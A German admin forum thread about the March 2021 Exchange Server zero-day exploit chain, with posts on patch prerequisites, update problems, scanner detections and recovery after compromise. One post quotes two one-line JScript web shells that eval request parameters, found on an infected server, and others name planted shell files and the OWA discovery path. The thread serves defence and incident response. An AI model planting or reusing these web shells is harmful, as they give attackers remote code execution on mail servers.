kgborn
Goto Top

0-day Exploit Chain für Exchange Server - Patches verfügbar

Zur Info: Microsoft warnt vor einer Exploit-Chain, bei der vier 0-day-Schwachstellen für gezielte Angriffe auf Exchange per Outlook Web App kombiniert werden (eine chines. Hackergruppe wird dahinter vermutet). Administratoren von On-PremisesMicrosoft Exchange-Servern sollten dringen reagieren und die zum 2. März 2021 freigegebenen Updates installieren. Auch für Exchange Server 2010 gibt es noch ein Sicherheitsupdate.

back-to-topMicrosoft hat folgende Beiträge zum Thema veröffentlicht:


Zusammenfassung: Exchange-Server 0-day-Exploits werden aktiv ausgenutzt, patchen!

Content-ID: 657826

Url: https://administrator.de/knowledge/0-day-exploit-chain-fuer-exchange-server-patches-verfuegbar-657826.html

Ausgedruckt am: 23.12.2024 um 06:12 Uhr

spec1re
spec1re 03.03.2021 um 07:23:51 Uhr
Goto Top
Danke, Patch wurde problemlos installiert. (Ex2016CU19)
Thomas2
Thomas2 03.03.2021 aktualisiert um 08:42:20 Uhr
Goto Top
Moin moin,

wird das Update nicht über das Windows Update feature verteilt?
Das CU19 ist von Dezember und enthält keinen Hinweis auf eine Aktualisierung.

"Cumulative Update 19 for Microsoft Exchange Server 2016 was released on December 15, 2020. This cumulative update includes fixes for nonsecurity issues and all previously released fixes for security and nonsecurity issues. These fixes will also be included in later cumulative updates for Exchange Server 2016. This update also resolves vulnerabilities, see Microsoft Common Vulnerabilities and Exposures CVE-2020-17117, CVE-2020-17132, CVE-2020-17141, CVE-2020-17142, CVE-2020-17143.

This update also includes new daylight saving time (DST) updates for Exchange Server 2016. For more information about DST, see Daylight Saving Time Help and Support Center."
spec1re
spec1re 03.03.2021 aktualisiert um 08:51:07 Uhr
Goto Top
@Thomas2

Um KB5000871 installieren zu können brauchst du mindestens Ex2013 mit CU23, Ex2016 mit CU18/CU19 oder Ex2019 mit CU7/CU8.

https://www.frankysweb.de/exchange-server-neue-sicherheitsupdates-maerz- ...
Thomas2
Thomas2 03.03.2021 um 08:59:48 Uhr
Goto Top
Hi Spec1re,

wir haben CU17, wenn ich die Version abfrage. Dann installiere ich das CU19. Auch da nochmal für mich zum Verständnis: Wenn ich das System immer über Windows Update aktualisiere ist es trotzdem nicht aktuell?

Vielen Dank.
spec1re
spec1re 03.03.2021 um 09:06:06 Uhr
Goto Top
Richtig, in diesem speziellen Fall dauert es etwas länger bis das Update über WU/WSUS erhältlich ist.

Für CU17 gibt es kein Patch, also musst du mindestens auf CU 18, besser gleich auf CU19 hoch gehen.

Gruß Spec.
VGem-e
VGem-e 03.03.2021 um 13:25:20 Uhr
Goto Top
Servus,

Installation problemlos verlaufen, habe mich positiv gewundert, dass der Reboot der VM heute Vormittag nach diesem Update so schnell durch war.

Gruß
Thomas2
Thomas2 05.03.2021 aktualisiert um 08:57:49 Uhr
Goto Top
Morning,

wir haben das Update von CU17 auf CU19 durchgeführt und den Sicherheitspatch installiert. Seitdem funktioniert bei uns im Outlook und im OWA die Suche nicht mehr.

Gruß,
Thomas

€: Nach einem Neuaufbau des Indexes geht die Suche auch wieder.
Frankys: Index neu erstellen
radiogugu
radiogugu 06.03.2021 aktualisiert um 10:03:16 Uhr
Goto Top
Hallo.

Exchange 2019 CU8

Ging, als ich die Hinweise bis gaaaaanz zum Schluss gelesen hatte, dann den Patch ausgeführt in einem Command Prompt, welches als Administrator gestartet wurde face-smile

EDIT: Backup wieder eingespielt. Es sah so aus, dass alles funktioniert, aber leider wollte der "Microsoft Filterwaltungsdienst" nicht mehr starten.
Keine Lösung gefunden. Also bleibt das System erst einmal ungepatcht. Werde weiter nach einer Lösung suchen
face-sad

Gruß
Marc
beidermachtvongreyscull
beidermachtvongreyscull 06.03.2021 um 21:48:12 Uhr
Goto Top
Moin,

kann jemand die Brisanz dieser Sicherheitslücken einschätzen, wenn vor dem Exchange eine Sophos UTM mit u.a. URL-Hardening und 2FA auf OWA vorhanden ist?

Gruß
bdmvg
spec1re
spec1re 06.03.2021 um 21:56:44 Uhr
Goto Top
Das Problem ist ja das die Auth komplett umgangen wird, keine Ahnung ob da 2FA was bringt. Kannst ja mal das Script von Microsoft auf dem Exchange laufen lassen, das sagt dir dann auch gleich was Sache ist.

https://github.com/microsoft/CSS-Exchange/tree/main/Security

Gruß Spec
anteNope
anteNope 06.03.2021 um 22:04:03 Uhr
Goto Top
Hi,

ich habe meine 2016er und 2019er direkt aktualisiert. Aktuellste CU und Patches liefen problemfrei durch.

Danach hatte ich nach den von Microsoft genannten ASPX-Dateien gesucht, aber manuell nichts entsprechendes gefunden.
Nun hat aber der Virenscanner zwei Dateien gefunden und direkt entfernt:

  • C:\inetpub\wwwroot\aspnet_client\discover.aspx (CVE-2021-26855.Webshell.A Trojaner)
  • C:\inetpub\wwwroot\aspnet_client\OutlookEN.aspx (CVE-2021-26855.Webshell.B Trojaner)

Die erste Datei wurde am 04.03. vom Echtzeit Dateischutz gelöscht. Die zweite wurde erst heute erkannt. Produkt im Einsatz ist "ESET-Mail-Security".

Einen aktiven Abgriff von Daten konnte ich bislang nicht feststellen.


Solch Mist wird wohl in den nächsten Jahren zum Standard werden.
beidermachtvongreyscull
beidermachtvongreyscull 07.03.2021 um 07:57:27 Uhr
Goto Top
Danke!

Die Auth des EX mit Sicherheit, aber die der Firewall nicht.
Selbst wenn der EX alles durchlassen würde, muss die FW dennoch ihr OK geben.

Ich schau mir das Script mal an.

Gruß
bdmvg
spec1re
spec1re 07.03.2021 um 08:43:53 Uhr
Goto Top
Hier ein aktuelle Liste von Microsoft mit Tools und Scripten für den Exchange:

https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vul ...

Ich lasse gerade mal den MSERT durch laufen...

Gruß Spec
ingrimmsch
ingrimmsch 08.03.2021 aktualisiert um 10:31:07 Uhr
Goto Top
Hallo Ich habe den Microsoft Safety Scanner - 1.0.3001.0 durchlaufen lassen und folgende Meldung erhalten:

Exploit: ASP/CVE-2021-27065.B!dha Teilweise entfern, Neustart erforderlich.

Unter dem Pfad:

%PROGRAMFILES%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\

Sehe ich die RedirSuiteServerProxa. aspx

wie kann ich diese auslesen um zu überprüfen ob da solche Informationen drin stehen?

http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>

oder

http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["klk123456"],"unsafe");}</script>

Der Exchangeserver (2013) hat die ProductVersion
15.00.1365.001 und hat alle Sicherheitsupdates eingespielt.

HTTP Zugänge sind dicht.

Habe den Saftey Scanner nach Neustart nun nochmal durchlaufen lassen. Nichts mehr gefunden :/
psannz
psannz 08.03.2021 um 10:34:08 Uhr
Goto Top
Zitat von @ingrimmsch:
Der Exchangeserver (2013) hat die ProductVersion
15.00.1365.001 und hat alle Sicherheitsupdates eingespielt.

Das ist Exchange Server 2013 CU19 und damit verwundbar. Für CU19 wird die Verwundbarkeit auch nicht mehr behoben!
Exchange Server - Buildnummern und Veröffentlichungstermine

Bitte aktualisiere dringend auf Kumulatives Update 23 für Exchange Server 2013 (KB4489622) und installiere danach das Security Update.
ingrimmsch
ingrimmsch 08.03.2021 um 11:23:51 Uhr
Goto Top
Das ist Exchange Server 2013 CU19 und damit verwundbar. Für CU19 wird die Verwundbarkeit auch nicht mehr behoben!
Exchange Server - Buildnummern und Veröffentlichungstermine

Bitte aktualisiere dringend auf Kumulatives Update 23 für Exchange Server 2013 (KB4489622) und installiere danach das Security Update.

Bringt das denn überhaupt noch was? Es sieht ja so aus als ob das System schon infiziert ist.
Dani
Dani 08.03.2021 um 11:36:35 Uhr
Goto Top
Moin @wieoderwas
Bringt das denn überhaupt noch was? Es sieht ja so aus als ob das System schon infiziert ist.
eigentlich kannst du dir die Zeit sparen. Du kannst dich mit dem Recovery beschäftigen. Davor aber die Schotten dicht machen, damit nicht gleich wieder die Infektion geschieht. Danach sämtliche Passwörter von allen Benutzern ändern. Nun kannst du dich ans Werk machen.


Gruß,
Dani
ingrimmsch
ingrimmsch 08.03.2021 um 11:41:07 Uhr
Goto Top
Zitat von @Dani:

Moin @wieoderwas
Bringt das denn überhaupt noch was? Es sieht ja so aus als ob das System schon infiziert ist.
eigentlich kannst du dir die Zeit sparen. Du kannst dich mit dem Recovery beschäftigen. Davor aber die Schotten dicht machen, damit nicht gleich wieder die Infektion geschieht. Danach sämtliche Passwörter von allen Benutzern ändern. Nun kannst du dich ans Werk machen.


Gruß,
Dani
Ich würde es wohl so vorgehen:
https://www.frankysweb.de/exchange-server-neuinstallation-ohne-datenverl ...
mossox
mossox 08.03.2021 um 19:13:18 Uhr
Goto Top
Uns hat es auch getroffen.
Basis ist hier ein W2012 R2 in Kombination mit Exchange 2016.
Es wird alles regelmäßig gepatched, aber das war nicht absehbar.
Die erste Attacke hatten wir in der Nacht zum 3.3.21.
Entdeckt wurde es heute. Ich kann nicht erkennen, ob es einen direkten Datenzugriff gab.

Wird ne lange Nacht...
kgborn
kgborn 08.03.2021 um 19:57:47 Uhr
Goto Top
Die Europäische Bankenaufsicht ist Opfer der Exchange-Schwachstelle - ich berichtete im Blog.

https://www.borncity.com/blog/2021/03/08/cyber-angriff-auf-exchange-serv ...

Ich habe das Thema auch mal bei heise im News-Ticker veröffentlicht.

https://www.heise.de/news/Cyberangriff-auf-Exchange-Server-der-Europaeis ...

Da dürfte die Tage noch mehr kommen (bei ~170.000 potentiell betroffenen Systemen).
beidermachtvongreyscull
beidermachtvongreyscull 08.03.2021 um 20:53:18 Uhr
Goto Top
Kollegen wisst Ihr, was ich noch nicht gestrahlt habe?

So ziemlich jede Quelle ballert pauschal raus, dass die EX 2013 - 2019 betroffen seien.

Was mich wundert:
Die Quellen berichten, dass die Angriffe aber erst seit etwa Januar laufen würden und dass natürlich nur Sicherheitsupdates für die aktuellsten CUs rauskommen.

Kann es also sein, dass mit den letzten CUs MS da nen Fehler eingebaut hat?

Ich habe seit längerem das Gefühl, dass die Qualität der MS-Updates wieder auf das NT4.0-Niveau gefallen ist:
  • Installationen dauern ewig
  • Update Chains sind wieder da

Aber vielleicht irre ich mich ja auch.

Gruß
bdmvg
Dani
Dani 08.03.2021 aktualisiert um 22:31:35 Uhr
Goto Top
Moin,
So ziemlich jede Quelle ballert pauschal raus, dass die EX 2013 - 2019 betroffen seien.
Exchange 2010 ist ebenfalls betroffen. Ist grundsätzlich seit 13.10.2020 EoS.

Update Chains sind wieder da
Hast du ein aktuelles Beispiel? Für Exchange Server ab 2013 fällt mir keines ein.

Aber vielleicht irre ich mich ja auch.
Ich habe schon überlegt, ob die Lücken aus dem Arsenal von FireEye durch den Solarwinds Hack stammen?!


Gruß,
Dani
beidermachtvongreyscull
beidermachtvongreyscull 08.03.2021 um 22:29:40 Uhr
Goto Top
Die CUs vom EX2016 sind von bestimmten .net-Framework-Versionen abhängig.

Du kannst also vom Stand X z.b. CU11 nicht direkt aktualisieren sondern musst nen Zwischenstopp über CU14 machen.


Beim 2010er war das schöner gelöst.

Gruß
bdmvg
themuck
themuck 09.03.2021 um 12:13:11 Uhr
Goto Top
Zitat von @beidermachtvongreyscull:
Die CUs vom EX2016 sind von bestimmten .net-Framework-Versionen abhängig.
Ja, aber du kannst mit etwas manuellem aufwand das auch Direkt machen, ohne diesen Zwischenstop...

https://www.msxfaq.de/exchange/update/exchange_direktes_update.htm

Was mich wunderte, Windows Update hat mir den Patch nicht angezeigt, ich hab ihn Manuell nachschieben müssen. Unser 2013er mit CU23 hängt glücklicherweise aber nicht offen im Netz. (Eine Empfehlung eines ehemaligen MS Entwicklers)

Was ich mich auch frage, wie findet man die URLs der Exchange so schnell. Das doch alles recht gut vorbereitet worden...
psannz
psannz 09.03.2021 aktualisiert um 13:01:53 Uhr
Goto Top
Zitat von @themuck:
Was ich mich auch frage, wie findet man die URLs der Exchange so schnell. Das doch alles recht gut vorbereitet worden...

autodiscover.domain.suffix/owa/
Mehr brauchst du meistens nicht.
Dani
Dani 09.03.2021 aktualisiert um 18:11:13 Uhr
Goto Top
Moin,
Microsoft hat heute Nacht für weitere CU's das Sicherheitsupdate bereitgestellt.
Security Update For Exchange Server 2016 Cumulative Update 14 (KB5000871)
Security Update For Exchange Server 2016 Cumulative Update 15 (KB5000871)
Security Update For Exchange Server 2016 Cumulative Update 16 (KB5000871)
Security Update For Exchange Server 2019 Cumulative Update 4 (KB5000871)
Security Update For Exchange Server 2019 Cumulative Update 5 (KB5000871)
Security Update For Exchange Server 2019 Cumulative Update 6 (KB5000871)

Details wie immer im KB-Artikel: https://support.microsoft.com/en-us/topic/description-of-the-security-up ...


Gruß,
Dani
beidermachtvongreyscull
beidermachtvongreyscull 09.03.2021 aktualisiert um 19:38:03 Uhr
Goto Top
Mal gespannt, ob noch einer für 2016 CU11 rauskommt. face-smile